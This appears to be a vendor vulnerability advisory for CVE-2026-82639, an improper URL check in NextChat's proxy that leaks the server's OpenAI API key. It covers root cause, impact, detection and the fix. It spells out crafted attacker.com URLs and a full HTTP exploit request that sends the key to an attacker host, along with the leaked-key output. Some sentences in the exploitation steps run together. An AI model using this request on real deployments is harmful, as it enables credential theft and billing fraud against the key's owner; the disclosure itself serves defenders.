
PEACH
Un cadre d’isolation des locataires
CVE-2026-82639 is an improper URL validation vulnerability in NextChat (ChatGPTNextWeb) versions 2.15.8 through 2.16.1 that allows unauthenticated remote attackers to exfiltrate the server's configured OpenAI API key. The flaw resides in the proxy endpoint (app/api/proxy.ts), where the x-base-url header is validated using a substring check (String.prototype.includes()) rather than proper hostname parsing, enabling bypass via crafted URLs. It was reported on June 2, 2026, publicly disclosed via GitHub issue on July 5, 2026, and published to the NVD and GitHub Advisory Database on August 30, 2026. The vulnerability carries a CVSS v3.1 score of 7.5 (High) and a CVSS v4.0 score of 8.7 (High) (Github Advisory, NextChat Issue).
The root cause is improper input validation (CWE-20) in app/api/proxy.ts (lines 37–46), where the code uses baseUrl?.includes("api.openai.com") — a plain substring containment check — to determine whether to inject the server's OPENAI_API_KEY into the outgoing Authorization header (NextChat Issue, proxy.ts source). Because this check does not parse the URL hostname, an attacker can supply values such as http://attacker.com?q=api.openai.com, http://attacker.com/path/api.openai.com/anything, or http://attacker.com#api.openai.com to satisfy the check while directing the server-side request to an attacker-controlled host. No authentication is required to reach this endpoint — the proxy handler performs no access-code or credential verification before injecting the API key. The correct fix is to parse the URL and compare the hostname directly: new URL(baseUrl).hostname === "api.openai.com". CodeQL query js/incomplete-url-substring-sanitization independently flags this code path (NextChat Issue).
Successful exploitation allows an unauthenticated attacker to steal the deployment's OPENAI_API_KEY in plaintext via a single crafted HTTP request, enabling arbitrary OpenAI API calls at the victim's expense. The impact is limited to confidentiality — there is no direct integrity or availability impact on the NextChat server itself — but the stolen key can be used for financial fraud (unauthorized API usage billed to the owner), data exfiltration via OpenAI APIs, or further attacks against OpenAI-integrated services. Access-code protection (CODE environment variable) does not mitigate this vulnerability, as the proxy endpoint bypasses authentication entirely, meaning all self-hosted NextChat deployments with OPENAI_API_KEY configured are at risk (NextChat Issue, Github Advisory).
A public proof-of-concept exploit is available as a GitHub issue with a detailed, step-by-step attack sequence including the exact HTTP request format and expected output (NextChat Issue). The exploit requires no authentication, no user interaction, and no special privileges, and has been assessed as automatable by NVD SSVC. The EPSS score is approximately 0.298% (22nd percentile), indicating a relatively low but non-negligible probability of exploitation in the wild within 30 days (Github Advisory). There is no current evidence of in-the-wild exploitation or threat actor attribution, and the vulnerability is not listed in the CISA KEV catalog as of the time of this report.
OPENAI_API_KEY configured — the standard setup for self-hosted deployments.x-base-url header that embeds api.openai.com as a substring while pointing to the attacker's server:GET /api/anyprov/testpath HTTP/1.1
Host: <target>:3000
x-base-url: http://<attacker-host>:9999?q=api.openai.comproxy.ts performs no authentication check.baseUrl.includes("api.openai.com") as true, injects Authorization: Bearer <OPENAI_API_KEY> into the outbound request, and forwards it to the attacker's server. The attacker's listener receives the full API key in plaintext:{"headers": {"Authorization": "Bearer sk-proj-<ACTUAL_OPENAI_API_KEY>", ...}}api.openai.com destinations) originating from the proxy handler; unusual connections to attacker-controlled IPs on non-standard ports (e.g., 9999) carrying an Authorization: Bearer sk-proj-... header.[Proxy Route] entries for requests to /api/<provider>/<path> endpoints with x-base-url header values that do not match https://api.openai.com exactly (e.g., containing api.openai.com as a query parameter or path fragment); repeated unauthenticated requests to the proxy endpoint from a single IP.The primary remediation is to upgrade NextChat to a version newer than 2.16.1, which addresses the flawed substring validation (Github Advisory). As a code-level fix, the x-base-url validation in proxy.ts should be replaced with proper URL hostname parsing: new URL(baseUrl).hostname === "api.openai.com" instead of baseUrl?.includes("api.openai.com") (NextChat Issue). As interim workarounds, operators should implement network egress controls to restrict outbound connections from the NextChat server to only api.openai.com, monitor proxy endpoint access logs for anomalous x-base-url values, and consider rotating the OPENAI_API_KEY if exposure is suspected.
The vulnerability was assigned by VulnCheck and published to the GitHub Advisory Database on August 30, 2026 (Github Advisory). It was referenced in a CISA weekly bulletin (SB26-243) and picked up by several vulnerability tracking platforms including VulnDB, ENISA EUVD (EUVD-2026-68215), and INCIBE-CERT shortly after disclosure. The original reporter noted that a prior security advisory (GHSA-rfph-4473-623x) had received no response from the maintainers before the public issue was filed, suggesting delayed vendor engagement (NextChat Issue).
Source: Ce rapport a été généré à l’aide de l’IA
Évaluation gratuite des vulnérabilités
Évaluez vos pratiques de sécurité cloud dans 9 domaines de sécurité pour évaluer votre niveau de risque et identifier les failles dans vos défenses.
Obtenez une démo personnalisée
"La meilleure expérience utilisateur que j’ai jamais vue, offre une visibilité totale sur les workloads cloud."
"Wiz fournit une interface unique pour voir ce qui se passe dans nos environnements cloud."
"Nous savons que si Wiz identifie quelque chose comme critique, c’est qu’il l’est réellement."